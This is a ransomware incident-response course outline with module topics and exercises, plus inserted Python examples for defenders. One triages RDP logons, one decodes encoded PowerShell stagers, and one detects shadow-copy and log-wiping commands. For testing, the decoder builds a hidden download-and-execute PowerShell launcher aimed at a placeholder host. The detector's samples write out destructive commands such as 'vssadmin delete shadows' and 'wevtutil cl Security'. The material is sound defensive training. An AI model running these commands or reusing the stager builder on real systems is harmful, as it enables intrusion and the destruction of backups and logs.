Ransomware for Incident Responders
Ransomware attackers have become more sophisticated, and their techniques constantly evolve. More than ever, organizations are at risk of losing their data and information to these attacks, which can lead to revenue losses, reputational damage, theft of employee time and productivity, and inability to function normally. The Ransomware for Incident Responders course teaches how to deal with the specifics of ransomware, from initial detection to incident response and postmortem analysis. The class features a hands-on approach to learning by applying real-world data exercises to train students on how to prepare for, detect, hunt, respond to, and deal with the aftermath of ransomware.(Online classes available)
Course Content
Module 1: Ransomware Incident Response Fundamentals
The Ransomware for Incident Responders course begins with a review of ransomware’s history. We begin with the story of the first-known ransomware attack and work our way to the current-day threats that loom over our industry. Our interconnected lives, not to mention livelihoods, are at risk every day thanks to the advent of Human-Operated Ransomware (HumOR) and Ransomware-as-a-Service (RaaS). You will deepen your understanding of ransomware as we dive into the roles, processes, communication methods, and activities associated with these threats.
Exercises
- Install the customized FOR528 Windows and SIFT VMs, configuring them as required for detailed log review and malware analysis
- Utilize a ransomware “builder” to generate a customized ransomware encryptor payload along with a decryption tool. You will run the ransomware payload you generate, review the encrypted files, and then use the decryption tool to decrypt the data.
- Review forensic artifacts collected from a compromised environment and then parse the data using KAPE. Utilize Timeline Explorer to review data parsed via KAPE while focusing on Master File Table (MFT), System Resource Usage Monitor (SRUM), Shellbags, Shimcache, and Windows Event Log artifacts.
- Hunt data within the TimeSketch interface, focusing on how analysis of MFT, SRUM, Shellbags, Shimcache, and Windows Event Log artifacts scales when moving from the manual review of the previous lab to analysis at scale
- Learn the ins and outs of Kibana, the most common front end for Elasticsearch, Logstash, and Kibana (ELK) stacks, while adapting the skills acquired in previous labs
Topics
- Course virtual machines
  - Overview & setup
- Custom attack scenarios overview
  - “BlueLocker” ransomware group
  - “Balrog” ransomware group
- Ransomware evolution and history
  - First recognized ransomware attack
  - Lockers and single-machine encryption payloads
  - Human-Operated Ransomware (HumOR)
- Ransomware-as-a-Service (RaaS)
  - RaaS model, hierarchies, and roles
  - RaaS builders and generators
  - RaaS dashboards
- Initial Access Brokers (IABs)
  - Methods of access
  - Darknet marketplaces
  - Victim access: selling vs. buying
- Ransomware operators
  - Group evolution over time
  - Types of extortion
  - Data leak sites and psychological pressure
  - Darkweb forum communications
- Forensic Artifact Collection
  - Review artifacts collected by the Kroll Artifact Parser and Extractor (KAPE)
  - Process/parse collected artifacts using KAPE
  - Review the parsed output to better understand the tools and methodologies used to parse the forensic data for review
- Incident Response processes and their application to ransomware
  - Dynamic Approach to Incident Response (DAIR) model
  - Phases of a typical ransomware campaign
- Windows Forensic Artifacts
  - Event Logs, Shellbags, Shimcache, SRUM, and more
  - Using Timeline Explorer to analyze CSV files output by common parsing tools
  - Artifact collection tools
  - Acquiring forensic artifacts
- Analysis at scale
  - Using Velociraptor to collect in bulk
  - Log augmentation via Sysmon
  - Log auditing review via Log-MD
  - Log aggregators/SIEMs and file names
- Analysis GUIs
  - TimeSketch
  - Kibana
Module 2: Ransomware Modus Operandi
Overview
Ransomware incidents are rarely unique. Incident responders see the same Tactics, Techniques, and Procedures (TTPs) over and over, so let’s learn how to detect them!
Section two transitions from foundational knowledge to the initial stages of the ransomware attack cycle. We begin with Initial Access, Execution, Defense Evasion, and scripting engine abuse. Most ransomware cases involve actors leveraging scripting engines such as PowerShell, batch scripts, JavaScript, Visual Basic Scripting (VBScript), and more.
Exercises
- Hunting malicious RDP activity to identify initial infection vectors and internal-to-internal lateral movement
- Identify successful phishing attacks via hunting Microsoft Office applications as parent processes, zip files opened natively in Windows, zip file credential read operations, Outlook downloading/executing files, and review of the Microsoft Trust Center
- Learn to analyze encoded and obfuscated PowerShell payloads
- Identify lateral movement via mechanisms such as RDP, PsExec, WMI, and Cobalt Strike
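For the first exercise above, hunting malicious RDP activity across parsed Windows Event Logs, the following is an added example (not course material) that triages Security 4624/4625 records carrying LogonType 10 (RemoteInteractive), the logon type an RDP session produces. The rows, host names and addresses are constructed to stand in for parser output such as EvtxECmd CSV; the RFC 1918 ranges used to separate internal-to-internal hops from Internet-facing logons are an assumption to adjust to the estate.

```python
"""Triage RDP logons from parsed Windows Security events.

Added example, not course code. Rows mimic the fields a parser such as
EvtxECmd writes for Security 4624/4625 (the constructed sample below stands in
for that output). LogonType 10 (RemoteInteractive) marks an RDP logon and the
IpAddress field names the connecting host, so external sources point at
initial access while RFC 1918 sources point at internal-to-internal movement.
"""
import ipaddress
from collections import Counter
from typing import Dict, List, Tuple

# Internal ranges are an assumption; replace with the estate's own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

Event = Tuple[str, int, int, str, str]   # (computer, event id, logon type, target user, source ip)

# Constructed sample: an exposed gateway is sprayed, then the working account hops inward.
SAMPLE_EVENTS: List[Event] = [
    ("VPN-GW01", 4625, 10, "administrator", "198.51.100.7"),
    ("VPN-GW01", 4625, 10, "administrator", "198.51.100.7"),
    ("VPN-GW01", 4625, 10, "backup",        "198.51.100.7"),
    ("VPN-GW01", 4624, 10, "backup",        "198.51.100.7"),  # success after the failures
    ("FS01",     4624, 10, "backup",        "10.10.5.23"),    # same account, internal hop
    ("DC01",     4624, 10, "backup",        "10.10.5.23"),    # and onward to a DC
    ("WS-ALICE", 4624,  2, "alice",         "-"),             # console logon, not RDP
    ("FS01",     4624,  3, "alice",         "10.10.7.41"),    # network (SMB) logon, not RDP
    ("FS01",     4624, 10, "alice",         "127.0.0.1"),     # RDP arriving via loopback
]


def source_class(ip: str) -> str:
    """local (console/tunnelled), internal (RFC 1918) or external."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:           # "-" or empty: no network source recorded
        return "local"
    if addr.is_loopback:
        return "local"
    return "internal" if any(addr in net for net in INTERNAL_NETS) else "external"


NOTES = {
    "external": "initial-access candidate: RDP from a non-RFC 1918 address",
    "internal": "lateral-movement candidate: internal-to-internal RDP",
    "local":    "RDP from loopback: check for RDP tunnelled over C2 or a SOCKS proxy",
}


def triage_rdp(events: List[Event], fail_threshold: int = 3) -> List[Dict[str, str]]:
    """One finding per successful RDP logon, plus one per source with repeated failures."""
    findings: List[Dict[str, str]] = []
    failures: Counter = Counter()
    for computer, event_id, logon_type, user, ip in events:
        if logon_type != 10:          # only RemoteInteractive; type 7 (Unlock) is worth a second pass
            continue
        cls = source_class(ip)
        if event_id == 4625:
            failures[(computer, ip)] += 1
        elif event_id == 4624:
            findings.append({"host": computer, "user": user, "src": ip, "class": cls, "note": NOTES[cls]})
    for (computer, ip), n in failures.items():
        if n >= fail_threshold:
            findings.append({"host": computer, "user": "*", "src": ip, "class": "brute-force",
                             "note": f"{n} failed RDP logons (4625, type 10) from {ip}"})
    return findings


def hosts_per_account(findings: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Accounts that reached several hosts over RDP: the pivot for following a hop chain."""
    seen: Dict[str, set] = {}
    for f in findings:
        if f["class"] != "brute-force":
            seen.setdefault(f["user"], set()).add(f["host"])
    return {user: sorted(hosts) for user, hosts in seen.items()}


if __name__ == "__main__":
    results = triage_rdp(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['host']:<9} {f['user']:<14} {f['src']:<14} {f['note']}")
    print(hosts_per_account(results))
```

Two caveats the output does not show: with Network Level Authentication enabled, a Type 3 logon from the same source lands on the target just before the Type 10, and reconnections to an existing session log as 4778 in Security (or event 25 in Microsoft-Windows-TerminalServices-LocalSessionManager/Operational) rather than a fresh 4624. The brute-force count is per (host, source), so a spray across many accounts from one address is caught while one address per account is not.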
Topics
The phases of a ransomware attack campaign:
- Initial Access
- Execution
- Defense Evasion
- Persistence
- Attacks against Active Directory
- Privilege Escalation
- Credential Access
- Lateral Movement
The following sections include in-depth details on the tools and processes noted above, along with methods for detection and hunting:
- Initial Access
  - Top 3 initial access vectors: RDP, phishing, and software vulnerabilities
  - Phishing vectors
    - Malware infection vs. credential harvesting
    - Malicious attachments such as MalDocs
    - Review of our Email Gateway File Block List (linked)
    - Malicious links and how to analyze them
  - Remote Desktop Protocol (RDP)
    - Importing Windows Event Logs
    - Identifying malicious RDP activity
  - Malware-as-a-Service (MaaS)
  - Software exploits / vulnerabilities
    - Zero-day vs. Common Vulnerabilities and Exposures (CVEs)
    - Example CVEs targeted and exploited in the wild
    - Darknet forum discussions regarding known vulnerabilities
- Execution and Defense Evasion
  - Threat actor tooling:
    - Free and Open-Source Software (FOSS)
    - Native scripting engines
    - Living Off the Land Binaries and Scripts (LOLBAS)
    - Commercial tooling for adversary emulation (e.g. Cobalt Strike)
    - Malware-as-a-Service (MaaS)
  - Security service/mechanism bypass methods
  - Native execution methods
  - Windows Management Instrumentation (WMI) attacks
  - Scripting engine abuse
    - PowerShell
    - Batch scripts
    - JavaScript scripts
    - Visual Basic Scripting
  - PowerShell logging and advanced analysis
    - Associated Windows Event Logs and enabling them
    - PowerShell parameters and their purposes
- Persistence
  - Common C2 methods
    - Remote Monitoring and Management (RMM) tools
    - Post-exploitation frameworks (e.g. Cobalt Strike, Empire, PowerSploit)
  - Account creation
  - Boot / logon auto-start locations
  - Service installations
  - Scheduled tasks
  - WMI event subscriptions
- Active Directory (AD) Attacks
  - AD enumeration
  - BloodHound & SharpHound
  - Kerberoasting
  - AS-REP Roasting
  - DCSync attacks
  - Golden ticket attacks
- Privilege Escalation and Credential Access
  - Commonly targeted accounts
  - Methods by which accounts are targeted
  - User Account Control (UAC) bypass methods
  - Local Security Authority Subsystem Service (LSASS) access and dumping
  - NTDS.dit attacks
  - Alternate credential attacks
    - Attacks on passwords stored in browsers and password management tools
    - Session sniffers and extractors
    - Commonly seen all-in-one solutions (e.g. WinPwn)
- Lateral Movement
  - RDP and RDP cached bitmap analysis
  - Server Message Block (SMB) lateral movement
  - Named pipe utilization and relation to service installs
  - Sysinternals PsExec
  - Windows Remote Management (WinRM)
  - Attacks against ESXi
Module 3: Advanced Ransomware Concepts
This section follows the campaign past the initial compromise: how operators find and stage data for exfiltration, tamper with backups and recovery, deploy and execute the encryptor, and lean on Cobalt Strike along the way. It closes with what to do while the actor is still active, including the decision around ransom payment, and with techniques for hunting the operators in your own data.
Exercises
- Hunt and identify data access and potential exfiltration by hunting and pivoting through NTFS metadata ($MFT, $UsnJrnl, etc.), manual parsing of acquired artifacts, Timeline Explorer, TimeSketch, and Kibana
- Decode and analyze Cobalt Strike payloads, including PowerShell shellcode injectors and “stageless” Beacon EXE and DLL loaders
- Detect the threat actor’s toolbox via hunting methods such as identifying PsTools, renamed executables, common staging directories, and more
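The Module 2 exercise on encoded and obfuscated PowerShell and the Cobalt Strike exercise above both start from the same artifact: a long `powershell.exe ... -enc <base64>` command line in Sysmon Event ID 1 or Security 4688. The following is an added example, not course code and not Cobalt Strike’s own, that peels the layers: first the UTF-16LE script behind -EncodedCommand, then the base64-plus-gzip (or raw deflate) blob that the stager decompresses into IEX. The sample command line is constructed here around a placeholder download cradle pointing at a documentation-range address, so nothing in it is a real payload.

```python
"""Peel the encoding layers off a PowerShell launcher command line.

Added example, not course code. Layer 1 is powershell.exe -EncodedCommand
(base64 over the UTF-16LE script). Layer 2 is the in-memory loader shape used
by Cobalt Strike's PowerShell stager: a base64 blob fed through a GzipStream
or DeflateStream into IEX. The sample command line is constructed here from a
placeholder inner stage; it is not a real payload.
"""
import base64
import gzip
import re
import zlib
from typing import List, Optional

# powershell.exe accepts -EncodedCommand, the documented alias -ec, and any
# unambiguous prefix (-e, -en, -enc, ...). Order does not matter: the required
# whitespace after the switch makes the regex back off to the right alias, and
# keeps -ExecutionPolicy from matching.
_ALIASES = ["encodedcommand"[:i] for i in range(14, 0, -1)] + ["ec"]
ENCODED_RE = re.compile(
    r"-(?:" + "|".join(_ALIASES) + r")\s+['\"]?([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)
# [Convert]::FromBase64String('...') whose output is decompressed before IEX
FROMB64_RE = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def unwrap_compressed_stage(script: str) -> Optional[str]:
    """Unwrap one base64 + gzip/raw-deflate layer, or None if the script has none."""
    m = FROMB64_RE.search(script)
    if not m:
        return None
    low = script.lower()
    try:
        blob = base64.b64decode(m.group(1))
        if "gzipstream" in low:
            return gzip.decompress(blob).decode("utf-8", "replace")
        if "deflatestream" in low:          # .NET DeflateStream is raw deflate: wbits=-15
            return zlib.decompress(blob, -15).decode("utf-8", "replace")
    except (ValueError, OSError, EOFError, zlib.error):
        return None
    return None


def decode_layers(cmdline: str, max_depth: int = 5) -> List[str]:
    """Outermost to innermost: the -EncodedCommand script, then each unwrapped stage."""
    layers: List[str] = []
    script = decode_encoded_command(cmdline)
    if script is None:
        return layers
    layers.append(script)
    while len(layers) < max_depth:
        nxt = unwrap_compressed_stage(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


# --- constructed sample: the attacker-side encoding, so the decoder has input ---
def build_gzip_stager(inner: str) -> str:
    """The gzip+base64 IEX loader shape, wrapped around an inner script."""
    b64 = base64.b64encode(gzip.compress(inner.encode())).decode()
    return ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + b64 + "'));"
            "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
            "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();")


def build_encoded_command(script: str) -> str:
    """A typical launcher line: no profile, hidden window, encoded script."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -enc " + b64


# Placeholder inner stage: a download cradle to a documentation-range address.
INNER_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
SAMPLE_CMDLINE = build_encoded_command(build_gzip_stager(INNER_STAGE))

if __name__ == "__main__":
    for depth, layer in enumerate(decode_layers(SAMPLE_CMDLINE), 1):
        print(f"--- layer {depth}, {len(layer)} chars ---")
        print(layer[:160])
```

In a real stager the innermost layer is the shellcode-injection script; the next step is carving the byte array out of it and handing it to the payload decoding tools the Cobalt Strike topic covers. Two decoder details matter in practice: the -e/-ec/-enc switch family is matched with required trailing whitespace so -ExecutionPolicy is never mistaken for it, and .NET’s DeflateStream is raw deflate, hence the wbits of -15.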
Topics
- Data Access
  - Reporting and legal considerations
  - Network share enumeration and access
  - Deleted file and file knowledge
  - File and folder access
  - Registry analysis
  - Tool-specific analysis
- Data Exfiltration
  - Archive creation
  - Data staging
  - Creation/use of .txt and .csv files
  - Data exfiltration routes
  - Network log and NetFlow review
- Backup and Recovery tampering
  - Volume Shadow Copy Service (VSS) attacks
  - Boot Configuration Data, Windows Boot Status Policy, and Windows Backup attacks
  - Event log clearing
- Payload Deployment
  - Common deployment tools and methods
  - Deployment via PsExec
  - Deployment via WMIC
  - Deployment via BITS
- Encryption and Decryptors
  - Encryption key types
  - Overwrite vs. copy/delete encryption methods
  - Ransom notes
  - Encryption mechanism source code review
  - Decryptors
- Cobalt Strike (CS)
  - Threat actor access and utilization
  - CS architecture and components
  - Malleable C2 profiles
  - Commands and cheat sheets
  - Detection methods
  - Payload decoding tools and methods
- Dealing with an Active Threat
  - Time considerations
  - Informed consent
  - Departments and roles that need to be involved
  - “Going dark,” a.k.a. cutting Internet connectivity
  - Securing critical services and functions
- Ransomware Payments
  - Cons regarding payment
  - Pros regarding payment
  - Threat actor communications and negotiations
- Hunting Ransomware Operators: techniques to identify
  - Malicious RDP connectivity
  - Process name and path anomalies
  - Rogue/malicious executables
  - PowerShell encoded commands
  - Malicious activity in antivirus logs
  - Malicious activity involving environment variables
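The Backup and Recovery tampering and Event log clearing topics above name commands that show up in process-creation telemetry minutes before the encryptor runs. As an added example (not course material), the following scans the CommandLine field of Security 4688 or Sysmon Event ID 1 records for those commands. The events are constructed, and the pattern list is an assumption covering the common vssadmin, wmic, PowerShell, bcdedit, wbadmin and wevtutil forms rather than an exhaustive rule set.

```python
"""Flag backup and recovery tampering in process-creation command lines.

Added example, not course code. Works over the CommandLine field of Security
4688 or Sysmon Event ID 1 records; the sample events are constructed.
Operators run these just before the encryptor so that shadow copies, Windows
Backup catalogs and the recovery environment are gone when it finishes.
"""
import re
from typing import Dict, Iterable, List, Tuple

# (label, regex). Each matches one tampering command form, case-insensitively.
# The list is an assumption: extend it with what your own cases have shown.
TAMPER_PATTERNS = [
    ("vss-delete",       r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"),
    ("vss-resize",       r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b"),  # shrink to purge
    ("wmic-shadowcopy",  r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"),
    ("ps-shadowcopy",    r"win32_shadowcopy.*(?:remove-wmiobject|remove-ciminstance|\.delete\(\))"),
    ("bcdedit-recovery", r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b"),
    ("bcdedit-bootstat", r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b"),
    ("wbadmin-delete",   r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+(?:catalog|systemstatebackup|backup)\b"),
    ("wevtutil-clear",   r"\bwevtutil(?:\.exe)?\b\s+(?:cl|clear-log)\b"),
]
COMPILED = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in TAMPER_PATTERNS]

Event = Tuple[str, str, str]   # (computer, utc timestamp, command line)

# Constructed sample: benign admin lookups mixed with the pre-encryption wipe.
SAMPLE_EVENTS: List[Event] = [
    ("FS01",   "2024-03-02T01:12:03Z", "vssadmin.exe list shadows"),
    ("FS01",   "2024-03-02T01:12:09Z", "vssadmin.exe delete shadows /all /quiet"),
    ("FS01",   "2024-03-02T01:12:11Z", "bcdedit.exe /set {default} recoveryenabled No"),
    ("FS01",   "2024-03-02T01:12:12Z", "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ("FS01",   "2024-03-02T01:12:15Z", "wbadmin.exe delete catalog -quiet"),
    ("DC01",   "2024-03-02T01:13:40Z", "wmic.exe shadowcopy delete"),
    ("DC01",   "2024-03-02T01:13:52Z", "wevtutil.exe cl Security"),
    ("WS-BOB", "2024-03-02T01:14:05Z", 'powershell.exe -c "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"'),
    ("WS-BOB", "2024-03-02T01:14:07Z", "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    ("WS-BOB", "2024-03-02T01:20:00Z", "wevtutil.exe qe System /c:5"),   # a query, not a clear
]


def classify(cmdline: str) -> List[str]:
    """Labels of every tampering pattern the command line matches (empty if none)."""
    return [label for label, rx in COMPILED if rx.search(cmdline)]


def scan(events: Iterable[Event]) -> List[Dict[str, object]]:
    """One hit per event that matches at least one pattern, keeping the raw line for the report."""
    hits: List[Dict[str, object]] = []
    for computer, ts, cmd in events:
        labels = classify(cmd)
        if labels:
            hits.append({"host": computer, "time": ts, "labels": labels, "cmd": cmd})
    return hits


def hosts_with_wipe_sequence(hits: List[Dict[str, object]], min_labels: int = 2) -> List[str]:
    """Hosts where several distinct techniques ran: the pre-deployment tell, not a one-off."""
    per_host: Dict[str, set] = {}
    for h in hits:
        per_host.setdefault(str(h["host"]), set()).update(h["labels"])  # type: ignore[arg-type]
    return sorted(host for host, labels in per_host.items() if len(labels) >= min_labels)


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['time']} {h['host']:<7} {','.join(h['labels']):<18} {h['cmd']}")
    print("wipe sequence on:", hosts_with_wipe_sequence(found))
```

Clearing a log also leaves Security 1102 (audit log cleared) or System 104 (other logs cleared) behind, so those event IDs are the second place to look once wevtutil has run. Requiring two distinct techniques on one host filters the occasional administrative vssadmin delete shadows after a disk cleanup while still catching the deployment-time wipe; lower min_labels on a small estate where any single hit deserves a look.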
Module 4: Course Capture the Flag Challenge
Overview
Whether your organization would need to begin all artifact collection and parsing after an incident, or you have already augmented your logging and take advantage of a full-fledged SIEM, the methods covered in the capstone map onto your organization’s own methods and capabilities.
Exercises
- A full day of analyzing parsed forensic artifacts and logs to answer questions common in every ransomware incident using two separate scenarios
Topics
- Digital Forensics Capstone
  - Analysis
    - Review parsed artifact and log data for Scenario 1 using TimeSketch
    - Review parsed artifact and log data for Scenario 2 using Kibana
    - Examine Windows Event Logs, Sysmon data, artifacts of program execution, registry hive files, and more
    - Follow the threat actor’s actions from initial infection vector through encryptor payload deployment and execution
    - Identify the tools, scripts, tactics, and processes used throughout each major phase of each attack campaign
  - Answer the questions every organization wants answered following a ransomware event, such as:
    - How did the actors get into the network?
    - What data, if any, were the actors able to access?
    - Were the actors able to steal (i.e. exfiltrate) any data?
    - Which systems were impacted by the overall campaign, including by the encryption payload itself?
    - And more!
International Student Fee: $950
Flexible Class Options
- Weekend Classes for Professionals SAT | SUN
- Corporate Group Trainings Available
- Online Classes – Live Virtual Class (L.V.C), Online Training
Related Courses
Advanced Incident Response, Threat Hunting, and Digital Forensics
Enterprise-Class Incident Response & Threat Hunting
Enterprise Memory Forensics In-Depth
Advanced Network Forensics- Threat Hunting, Analysis, and Incident Response